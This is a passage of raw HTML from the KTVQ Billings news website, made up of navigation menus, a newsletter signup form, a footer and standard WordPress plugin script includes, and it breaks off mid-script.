menu-item-object-custom menu-item-100993"><a href="http://ktvq.com/ski-report/" class="elementor-sub-item">Ski Report</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4728"><a target="_blank" href="http://montanasports.com" class="elementor-item">Sports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4707"><a href="https://ktvq.com/category/community/" class="elementor-item">Community</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-122153"><a target="_blank" href="https://my406deals.incentrev.com/billings/9000104-mtn-powder-pass" class="elementor-sub-item">MTN Powder Pass</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6736"><a target="_blank" href="https://www.q2deals.com/deal/default?redirectUrl=home.action&#038;showSplashPopup=true" class="elementor-sub-item">Foodie Fridays</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22666"><a href="https://ktvq.com/a-better-you/" class="elementor-sub-item">A Better You</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22665"><a href="https://ktvq.com/a-waiting-child/" class="elementor-sub-item">A Waiting Child</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6737"><a target="_blank" href="http://underthebigsky.com" class="elementor-sub-item">Under the Big Sky</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23204"><a href="https://ktvq.com/student-of-the-week/" class="elementor-sub-item">Students of the Week</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27742"><a href="https://ktvq.com/category/community/athlete-of-the-week/" class="elementor-sub-item">Athlete of the Week</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39490"><a href="https://ktvq.com/montana-matters/" class="elementor-sub-item">Montana Matters</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-157477"><a href="https://ktvq.com/on-the-job-with-rob/" class="elementor-sub-item">On the Job with Rob</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38668"><a href="https://ktvq.com/contests/" class="elementor-sub-item">Contests</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23203"><a href="https://ktvq.com/submit-anniversary-or-birthday/" class="elementor-sub-item">Submit Anniversary or Birthday</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-post menu-item-138607"><a href="https://ktvq.com/community/2019/01/31/ktvq-polls/" class="elementor-sub-item">KTVQ Polls</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23376"><a href="https://ktvq.com/one-school-at-a-time/" class="elementor-sub-item">One School at a Time</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-59730"><a target="_blank" href="https://landing.informedinteractive.com/build-billings-billings-hardware/" class="elementor-sub-item">Build Billings</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-184969"><a target="_blank" href="https://ktvq.halfoffdeal.com/index.php?index_type=promo-detail&#038;h=8638457" class="elementor-sub-item">2019 Golf Card</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27950"><a href="https://ktvq.com/sponsored/" class="elementor-sub-item">Sponsored</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4711"><a href="https://ktvq.com/watch/" class="elementor-item">Watch</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23066"><a href="https://ktvq.com/video/" class="elementor-sub-item">Video</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40031"><a href="https://ktvq.com/category/photo-galleries/" class="elementor-sub-item">Photo Galleries</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23094"><a href="https://ktvq.com/live/" class="elementor-sub-item">Watch Q2 News Live</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-104619"><a href="https://ktvq.com/on-ktvq/" class="elementor-sub-item">On KTVQ</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4713"><a href="https://ktvq.com/about/" class="elementor-item">About</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23524"><a href="https://ktvq.com/about/" class="elementor-sub-item">Contact Us</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23375"><a href="https://ktvq.com/closed-captioning-information/" class="elementor-sub-item">Closed Captioning Information</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-200934"><a target="_blank" href="https://scripps.com/careers/find-a-job/" class="elementor-sub-item">Jobs at KTVQ</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23373"><a href="https://ktvq.com/q2-apps/" class="elementor-sub-item">Q2 Apps</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25545"><a href="https://ktvq.com/category/news-team/" class="elementor-sub-item">Q2 News Staff</a></li> </ul> </li> </ul></nav> <div class="elementor-menu-toggle"> <i class="eicon" aria-hidden="true"></i> </div> <nav class="elementor-nav-menu--dropdown elementor-nav-menu__container"><ul id="menu-2-2b70fa4a" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4708"><a href="https://ktvq.com/category/news/" class="elementor-item">News</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4718"><a href="https://ktvq.com/category/news/local-news/" class="elementor-sub-item">Local News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-88039"><a href="https://ktvq.com/category/news/political-news/" class="elementor-sub-item">Political News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4720"><a href="https://ktvq.com/category/news/montana-news/" class="elementor-sub-item">Montana News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4722"><a href="https://ktvq.com/category/news/national-news/" class="elementor-sub-item">National News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22664"><a href="https://ktvq.com/category/news/crime-watch/" class="elementor-sub-item">Crime Watch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27561"><a href="https://ktvq.com/category/news/digital-original/" class="elementor-sub-item">Digital Original</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22061"><a href="https://ktvq.com/montana-ag-network/" class="elementor-sub-item">Montana Ag Network</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23867"><a href="https://ktvq.com/montana-made/" class="elementor-sub-item">Montana Made</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13497"><a href="https://ktvq.com/q2-rewind/" class="elementor-sub-item">Q2 Rewind</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25105"><a href="http://ktvq.com/fire-watch/" class="elementor-sub-item">Fire Watch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22085"><a href="https://ktvq.com/category/news/trending/" class="elementor-sub-item">Trending</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4742"><a href="https://ktvq.com/weather/" class="elementor-item">Weather</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4740"><a href="https://ktvq.com/stormtracker-doppler/" class="elementor-sub-item">STORMTracker Doppler</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4762"><a href="https://ktvq.com/travel-conditions/" class="elementor-sub-item">Travel Conditions</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4761"><a href="https://ktvq.com/interactive-radar-map/" class="elementor-sub-item">Interactive Radar Map</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100993"><a href="http://ktvq.com/ski-report/" class="elementor-sub-item">Ski Report</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4728"><a target="_blank" href="http://montanasports.com" class="elementor-item">Sports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4707"><a href="https://ktvq.com/category/community/" class="elementor-item">Community</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-122153"><a target="_blank" href="https://my406deals.incentrev.com/billings/9000104-mtn-powder-pass" class="elementor-sub-item">MTN Powder Pass</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6736"><a target="_blank" href="https://www.q2deals.com/deal/default?redirectUrl=home.action&#038;showSplashPopup=true" class="elementor-sub-item">Foodie Fridays</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22666"><a href="https://ktvq.com/a-better-you/" class="elementor-sub-item">A Better You</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22665"><a href="https://ktvq.com/a-waiting-child/" class="elementor-sub-item">A Waiting Child</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6737"><a target="_blank" href="http://underthebigsky.com" class="elementor-sub-item">Under the Big Sky</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23204"><a href="https://ktvq.com/student-of-the-week/" class="elementor-sub-item">Students of the Week</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27742"><a href="https://ktvq.com/category/community/athlete-of-the-week/" class="elementor-sub-item">Athlete of the Week</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39490"><a href="https://ktvq.com/montana-matters/" class="elementor-sub-item">Montana Matters</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-157477"><a href="https://ktvq.com/on-the-job-with-rob/" class="elementor-sub-item">On the Job with Rob</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38668"><a href="https://ktvq.com/contests/" class="elementor-sub-item">Contests</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23203"><a href="https://ktvq.com/submit-anniversary-or-birthday/" class="elementor-sub-item">Submit Anniversary or Birthday</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-post menu-item-138607"><a href="https://ktvq.com/community/2019/01/31/ktvq-polls/" class="elementor-sub-item">KTVQ Polls</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23376"><a href="https://ktvq.com/one-school-at-a-time/" class="elementor-sub-item">One School at a Time</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-59730"><a target="_blank" href="https://landing.informedinteractive.com/build-billings-billings-hardware/" class="elementor-sub-item">Build Billings</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-184969"><a target="_blank" href="https://ktvq.halfoffdeal.com/index.php?index_type=promo-detail&#038;h=8638457" class="elementor-sub-item">2019 Golf Card</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27950"><a href="https://ktvq.com/sponsored/" class="elementor-sub-item">Sponsored</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4711"><a href="https://ktvq.com/watch/" class="elementor-item">Watch</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23066"><a href="https://ktvq.com/video/" class="elementor-sub-item">Video</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40031"><a href="https://ktvq.com/category/photo-galleries/" class="elementor-sub-item">Photo Galleries</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23094"><a href="https://ktvq.com/live/" class="elementor-sub-item">Watch Q2 News Live</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-104619"><a href="https://ktvq.com/on-ktvq/" class="elementor-sub-item">On KTVQ</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4713"><a href="https://ktvq.com/about/" class="elementor-item">About</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23524"><a href="https://ktvq.com/about/" class="elementor-sub-item">Contact Us</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23375"><a href="https://ktvq.com/closed-captioning-information/" class="elementor-sub-item">Closed Captioning Information</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-200934"><a target="_blank" href="https://scripps.com/careers/find-a-job/" class="elementor-sub-item">Jobs at KTVQ</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23373"><a href="https://ktvq.com/q2-apps/" class="elementor-sub-item">Q2 Apps</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25545"><a href="https://ktvq.com/category/news-team/" class="elementor-sub-item">Q2 News Staff</a></li> </ul> </li> </ul></nav> </div> </div> <div data-id="19401ed9" class="elementor-element elementor-element-19401ed9 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium">SOCIAL</h5> </div> </div> <div data-id="34155705" class="elementor-element elementor-element-34155705 elementor-shape-rounded elementor-widget elementor-widget-social-icons" data-element_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper"> <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube" href="https://www.youtube.com/channel/UCN2IWwjVxh4vOnMbnjiM8Hw" target="_blank"> <span class="elementor-screen-only">Youtube</span> <i class="fa fa-youtube"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-instagram" href="https://www.instagram.com/ktvq/" target="_blank"> <span class="elementor-screen-only">Instagram</span> <i class="fa fa-instagram"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook" href="https://www.facebook.com/Q2News/" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fa fa-facebook"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-twitter" href="https://twitter.com/ktvq?lang=en" target="_blank"> <span class="elementor-screen-only">Twitter</span> <i class="fa fa-twitter"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-envelope" href="https://ktvq.com/ktvq/about/" target="_blank"> <span class="elementor-screen-only">Envelope</span> <i class="fa fa-envelope"></i> </a> </div> </div> </div> <div data-id="3f1d320a" class="elementor-element elementor-element-3f1d320a elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium">Work with us</h5> </div> </div> <div data-id="73949939" class="elementor-element elementor-element-73949939 elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Current job openings at <a href="https://scripps.com/careers/find-a-job/" target="_blank" rel="noopener">KTVQ</a> </p></div> </div> </div> <div data-id="4871ece8" class="elementor-element elementor-element-4871ece8 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium"><a href="https://ktvq.com/ktvq/about/">ABOUT KTVQ</a></h5> </div> </div> <div data-id="6698d393" class="elementor-element elementor-element-6698d393 elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><ul><li><p>KTVQ.com is your source for continuous news, sports and weather information for Billings, Montana.</p><ul><li><a href="https://ktvq.com/about/">About us</a></li><li><a href="https://ktvq.com/about/">Contact us</a></li></ul></li></ul></div> </div> </div> <div data-id="6634f3a8" class="elementor-element elementor-element-6634f3a8 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium">KTVQ email newsletters</h5> </div> </div> <div data-id="6c80f206" class="elementor-element elementor-element-6c80f206 elementor-widget elementor-widget-wp-widget-gform_widget" data-element_type="wp-widget-gform_widget.default"> <div class="elementor-widget-container"> <script type="text/javascript"> var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2},"base_url":"https:\/\/ktvq.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/ktvq.com\/wp-content\/plugins\/gravityforms\/images\/spinner.gif"}; </script> <div class='gf_browser_chrome gform_wrapper' id='gform_wrapper_1' ><form method='post' enctype='multipart/form-data' id='gform_1' action='/'> <div class='gform_body'><ul id='gform_fields_1' class='gform_fields top_label form_sublabel_below description_below'><li id='field_1_1' class='gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_1_1' >Email Address<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_1_1' type='email' value='' class='large' tabindex='1' aria-required="true" aria-invalid="false"/> </div></li><li id='field_1_2' class='gfield field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' ></label><div class='ginput_container ginput_container_checkbox'><ul class='gfield_checkbox' id='input_1_2'><li class='gchoice_select_all'> <input type='checkbox' id='choice_2_select_all' tabindex='2' onclick='gformToggleCheckboxes( this )' onkeypress='gformToggleCheckboxes( this )' /> <label for='choice_2_select_all' id='label_2_select_all' data-label-select='Select All' data-label-deselect='Deselect All'>Select All</label> </li><li class='gchoice_1_2_1'> <input name='input_2.1' type='checkbox' value='Morning News Headlines' id='choice_1_2_1' tabindex='3' /> <label for='choice_1_2_1' id='label_1_2_1'>Morning News Headlines</label> </li><li class='gchoice_1_2_2'> <input name='input_2.2' type='checkbox' value='Evening News Headlines' id='choice_1_2_2' tabindex='4' /> <label for='choice_1_2_2' id='label_1_2_2'>Evening News Headlines</label> </li><li class='gchoice_1_2_3'> <input name='input_2.3' type='checkbox' value='Breaking News Alerts' id='choice_1_2_3' tabindex='5' /> <label for='choice_1_2_3' id='label_1_2_3'>Breaking News Alerts</label> </li><li class='gchoice_1_2_4'> <input name='input_2.4' type='checkbox' value='KTVQ Contests' id='choice_1_2_4' tabindex='6' /> <label for='choice_1_2_4' id='label_1_2_4'>KTVQ Contests</label> </li><li class='gchoice_1_2_5'> <input name='input_2.5' type='checkbox' value='KTVQ Coupon and Special Offers' id='choice_1_2_5' tabindex='7' /> <label for='choice_1_2_5' id='label_1_2_5'>KTVQ Coupon and Special Offers</label> </li></ul></div></li> </ul></div> <div class='gform_footer top_label'> <input type='submit' id='gform_submit_button_1' class='gform_button button' value='Subscribe' tabindex='8' onclick='if(window["gf_submitting_1"]){return false;} if( !jQuery("#gform_1")[0].checkValidity || jQuery("#gform_1")[0].checkValidity()){window["gf_submitting_1"]=true;} ' onkeypress='if( event.keyCode == 13 ){ if(window["gf_submitting_1"]){return false;} if( !jQuery("#gform_1")[0].checkValidity || jQuery("#gform_1")[0].checkValidity()){window["gf_submitting_1"]=true;} jQuery("#gform_1").trigger("submit",[true]); }' /> <input type='hidden' class='gform_hidden' name='is_submit_1' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='1' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_1' value='WyJbXSIsIjc1MGFjYWQyMmYzNzJiYWY5NzQwMjRjYjI3MzU1YzNiIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_1' id='gform_target_page_number_1' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_1' id='gform_source_page_number_1' value='1' /> <input type='hidden' name='gform_field_values' value='' /> </div> </form> </div><script type='text/javascript'> if(typeof gf_global == 'undefined') var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2},"base_url":"https:\/\/ktvq.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/ktvq.com\/wp-content\/plugins\/gravityforms\/images\/spinner.gif"};jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 1) {} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} );</script><script type='text/javascript'> jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [1, 1]) } ); </script> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section data-id="722ae505" class="elementor-element elementor-element-722ae505 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="24459aae" class="elementor-element elementor-element-24459aae elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="47d50f3e" class="elementor-element elementor-element-47d50f3e elementor-hidden-desktop elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-11" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-11'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div></section> </div> </div> </div> <footer id="footer-copyright" role="contentinfo"> <div class="container"> <div class="content-copyright"> <div class="pull-left-copyright"> <a href="https://ktvq.com/terms-of-service/">Terms of Use</a> | <a href="https://ktvq.com/privacy-policy/">Privacy Policy</a> | <a href="http://www.aboutads.info/choices">Ad Choices</a> | <a href="https://publicfiles.fcc.gov/tv-profile/ktvq" target="_blank">FCC Public File</a> | <a href="https://publicfiles.fcc.gov/tv-profile/ktvq/equal-employment-opportunity-records/additional-documents/eeo-public-file-reports/81c417e5-46e9-3ec4-1a8c-82761b9eca87/" target="_blank">EEO Report</a> </div> <div class="pull-right-copyright"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/02183500/logo-scripps.png"> Scripps TV Station Group<br /> © 2019 The E.W. Scripps Co. </div> </div> </div><!-- .container --> </footer> </div><!-- #container --> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WXSM69Q" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div id="pojo-scroll-up" class="pojo-scroll-up-right" data-offset="always" data-duration="750" style="font-size: 36px;border-radius: 6px"> <div class="pojo-scroll-up-inner"> <a class="pojo-scroll-up-button" href="javascript:void(0);" title="Scroll to top"> <span class="fa fa-angle-up"></span><span class="sr-only">Scroll to top</span> </a> </div> </div> <div class="pswp" tabindex="-1" role="dialog" aria-hidden="true"> <div class="pswp__bg"></div> <div class="pswp__scroll-wrap"> <div class="pswp__container"> <div class="pswp__item"></div> <div class="pswp__item"></div> <div class="pswp__item"></div> </div> <div class="pswp__ui pswp__ui--hidden"> <div class="pswp__top-bar"> <div class="pswp__counter"></div> <button class="pswp__button pswp__button--close" title="Close (Esc)"></button> <button class="pswp__button pswp__button--share" title="Share"></button> <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button> <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button> <div class="pswp__preloader"> <div class="pswp__preloader__icn"> <div class="pswp__preloader__cut"> <div class="pswp__preloader__donut"></div> </div> </div> </div> </div> <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap"> <div class="pswp__share-tooltip"></div> </div> <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)"> </button> <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)"> </button> <div class="pswp__caption"> <div class="pswp__caption__center"></div> </div> </div> </div> </div> <link rel='stylesheet' id='elementor-post-116582-css' href='https://ktvq.com/wp-content/uploads/sites/6/elementor/css/post-116582.css?ver=1545589656' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-4743-css' href='https://ktvq.com/wp-content/uploads/sites/6/elementor/css/post-4743.css?ver=1557802025' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var breakingNews = {"siteURL":"https:\/\/ktvq.com","breakingNewsTitle":"Breaking: ","breakingWeatherTitle":"Weather Alert:","breakingNewsBg":"#C13131","breakingWeatherBg":"#E9CD00"}; /* ]]> */ </script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/cordillera-breaking-news/dist/build.js?ver=1.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var watchLive = {"url":"https:\/\/ktvq.com\/wp-json\/watch-live\/v1\/get"}; /* ]]> */ </script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/cordillera-watch-live/dist/build.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var pollsL10n = {"ajax_url":"https:\/\/ktvq.com\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.75.2'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/pojo-forms/assets/js/app.min.js?ver=5.0.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var PojoA11yOptions = {"focusable":"","remove_link_target":"","add_role_links":"1","enable_save":"1","save_expiration":"12"}; /* ]]> */ </script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/themes/buzz/assets/bootstrap/js/bootstrap.min.js?ver=3.3.5'></script> <script type='text/javascript'> /* <![CDATA[ */ var Pojo = {"ajaxurl":"https:\/\/ktvq.com\/wp-admin\/admin-ajax.php","css_framework_type":"bootstrap","superfish_args":{"delay":150,"animation":{"opacity":"show","height":"show"},"speed":"fast"}}; /* ]]> */ </script> <script type='text/javascript' src='https://ktvq.com/wp-content/themes/buzz/assets/js/frontend.min.js?ver=1.7.12'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/youtube-embed-plus-pro/scripts/fitvids.min.js?ver=12.0'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/themes/buzz/core/assets/masterslider/masterslider.min.js?ver=2.9.5'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/pojo-lightbox/assets/photoswipe/photoswipe.min.js?ver=4.1.2'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/pojo-lightbox/assets/photoswipe/photoswipe-ui-default.min.js?ver=4.1.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var PojoLightboxOptions = {"script_type":"photoswipe","smartphone":"","woocommerce":"","lightbox_args":{"loop":true,"closeOnScroll":true,"closeOnVerticalDrag":true,"escKey":true,"arrowKeys":true,"history":true,"captionEl":true,"closeEl":true,"fullscreenEl":true,"zoomEl":true,"counterEl":true,"arrowEl":true,"shareEl":true}}; /* ]]> */ </script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/pojo-lightbox/assets/js/app.min.js?ver=5.0.3'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/pojo-news-ticker/assets/js/app.min.js?ver=5.0.3'></script> <script type='text/javascript' src='https://ktvq.com/wp-includes/js/wp-embed.min.js?ver=5.0.3'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?ver=1.0.1'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/gravityforms/js/jquery.json.min.js?ver=2.3.2.15'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/gravityforms/js/gravityforms.min.js?ver=2.3.2.15'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=2.1.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/ktvq.com\/wp-admin\/admin-ajax.php","nonce":"9f3470e8bb","shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"google":{"title":"Google+","has_counter":true},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"delicious":{"title":"Delicious"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"}},"facebook_sdk":{"lang":"en_US","app_id":""}}; /* ]]> */ </script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=2.1.2'></script> <script type='text/javascript' src='https://ktvq.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.4.1'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.jquery.min.js?ver=4.4.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var elementorFrontendConfig = 